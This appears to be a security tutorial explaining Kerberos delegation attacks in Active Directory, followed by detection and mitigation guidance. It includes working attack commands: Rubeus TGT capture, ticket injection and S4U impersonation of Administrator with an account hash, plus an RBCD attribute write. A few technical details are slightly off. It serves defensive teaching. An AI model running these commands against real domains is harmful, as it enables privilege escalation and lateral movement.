Kerberos Delegation Attacks: Exploiting Trust in Active Directory

Introduction to Kerberos Delegation Attacks

Kerberos delegation is a feature in Active Directory that allows a service to impersonate a user or another service when accessing resources hosted on a different server. While this feature is designed to facilitate multi-tier applications, it can be exploited by attackers to escalate privileges and move laterally within a network. This article explores various Kerberos delegation attacks, their impact, and how to defend against them.

Types of Kerberos Delegation

There are three main types of Kerberos delegation in Active Directory:

1. Unconstrained Delegation: Allows a service to impersonate a user to any other service.
2. Constrained Delegation: Restricts the services to which a server can impersonate a user.
3. Resource-Based Constrained Delegation (RBCD): Allows the resource to determine which accounts can impersonate users to it.

Unconstrained Delegation Attacks

Unconstrained delegation poses the most significant security risk as it allows a compromised server to impersonate any user to any service. Here's how an attacker can exploit this:

1. Compromise a server with unconstrained delegation enabled.
2. Wait for a high-privileged user (like a domain admin) to authenticate to the compromised server.
3. Capture the user's Ticket Granting Ticket (TGT) from memory.
4. Use the captured TGT to impersonate the user and access any resource in the domain.

Command Examples for Unconstrained Delegation Attacks

Here are some command examples demonstrating unconstrained delegation attacks:

Get-ADComputer -Filter {TrustedForDelegation -eq $true}

PowerShell command to find computers with unconstrained delegation enabled

Rubeus.exe monitor /interval:5 /filteruser:DC01$

Use Rubeus to monitor for and capture TGTs

Rubeus.exe ptt /ticket:doIFCDCCBQSgAwIBBaEDAgEWoo...

Use Rubeus to inject a captured TGT into the current session

Constrained delegation limits the scope of impersonation but can still be exploited. Attackers can:

1. Compromise an account configured for constrained delegation.
2. Request a TGT for this account using S4U2Self.
3. Use S4U2Proxy to request a service ticket for the allowed service.
4. Access the service as any user in the domain.

Command Examples for Constrained Delegation Attacks

Here are some command examples for constrained delegation attacks:

Get-ADObject -Filter {msDS-AllowedToDelegateTo -like '*'} -Properties msDS-AllowedToDelegateTo

Rubeus.exe s4u /user:WebServer$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/FileServer.contoso.com /ptt

Use Rubeus to perform S4U2Self and S4U2Proxy for constrained delegation

Resource-Based Constrained Delegation (RBCD) Attacks

RBCD allows for more granular control but can be exploited if an attacker has write permissions on the target computer object. The attack process involves:

1. Create a new machine account or compromise an existing one.
2. Modify the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
3. Use the controlled account to request a ticket for any user to the target service.

Command Examples for RBCD Attacks

Here are some command examples for RBCD attacks:

Import-Module PowerView.ps1

Import PowerView module for AD enumeration and exploitation

Set-ADComputer TargetComputer -PrincipalsAllowedToDelegateToAccount AttackerComputer$

Set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute

Rubeus.exe s4u /user:AttackerComputer$ /rc4:AttackerComputerHash /impersonateuser:Administrator /msdsspn:cifs/TargetComputer.contoso.com /ptt

Use Rubeus to perform the RBCD attack

Detecting Kerberos Delegation Attacks

Detecting Kerberos delegation attacks requires monitoring several indicators:

Monitor for changes to delegation settings on computer and user objects.
Look for unusual patterns of TGT requests, especially from servers with unconstrained delegation.
Monitor for the creation of machine accounts by non-administrative users.
Analyze Windows Event logs, particularly events related to TGT issuance and service ticket requests.
Use Microsoft Advanced Threat Analytics (ATA) or Azure Advanced Threat Protection (ATP) for anomaly detection.

Command Examples for Detection

Here are some command examples to help detect potential Kerberos delegation attacks:

Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} | Where-Object {$_.Properties[7].Value -eq 0x40810000}

PowerShell command to retrieve Kerberos TGS requests with forwardable flag (potential unconstrained delegation)

Get-ADUser -Filter {TrustedForDelegation -eq $true -or msDS-AllowedToDelegateTo -like '*'} -Properties TrustedForDelegation,msDS-AllowedToDelegateTo

Find user accounts configured for delegation

Mitigating Kerberos Delegation Attacks

To mitigate the risks associated with Kerberos delegation attacks, consider the following strategies:

Limit the use of unconstrained delegation and prefer constrained or resource-based constrained delegation.
Regularly audit and review delegation settings in your Active Directory environment.
Implement the principle of least privilege for all accounts and services.
Use Protected Users security group for highly privileged accounts to prevent delegation.
Enable Kerberos armoring (FAST) where possible to protect against certain types of delegation attacks.
Implement strong access controls on computer objects to prevent unauthorized modification of delegation settings.
Regularly rotate service account passwords and use managed service accounts where possible.
Monitor and alert on suspicious Kerberos ticket requests and delegation activities.
Keep systems and applications up-to-date with the latest security patches.

Command Examples for Mitigation

Here are some command examples to help implement mitigation strategies:

Set-ADAccountControl -Identity 'CN=TargetComputer,CN=Computers,DC=contoso,DC=com' -TrustedForDelegation $false

Disable unconstrained delegation for a computer account

Add-ADGroupMember -Identity 'Protected Users' -Members 'CN=Admin1,CN=Users,DC=contoso,DC=com'

Add a user to the Protected Users security group

Set-ADUser -Identity ServiceAccount -AccountNotDelegated $true

Prevent a service account from being delegated

Conclusion

Kerberos delegation attacks pose a significant threat to Active Directory environments, potentially allowing attackers to escalate privileges and move laterally within a network. By understanding these attack vectors, implementing robust detection mechanisms, and following best practices for mitigation, organizations can significantly reduce their exposure to these risks. Regular auditing, monitoring, and maintaining a principle of least privilege are key to maintaining a strong security posture against Kerberos delegation attacks.